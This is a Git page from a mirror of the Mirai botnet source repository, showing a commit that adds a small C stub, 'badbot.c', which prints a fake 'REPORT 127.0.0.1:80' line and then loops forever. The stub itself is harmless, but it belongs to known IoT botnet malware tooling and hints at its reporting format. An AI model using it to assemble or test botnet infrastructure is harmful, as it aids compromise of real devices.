mirror of
https://github.com/jgamblin/Mirai-Source-Code
synced 2025-11-09 03:53:01 +00:00
Code Upload
Code Upload
This commit is contained in:
12
mirai/tools/badbot.c
Executable file
12
mirai/tools/badbot.c
Executable file
@@ -0,0 +1,12 @@
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int main(int argc, char **args)
|
||||
{
|
||||
printf("REPORT %s:%s\n", "127.0.0.1", "80");
|
||||
|
||||
while (1)
|
||||
sleep(1);
|
||||
|
||||
return 0;
|
||||
}
|
||||
Reference in New Issue
Block a user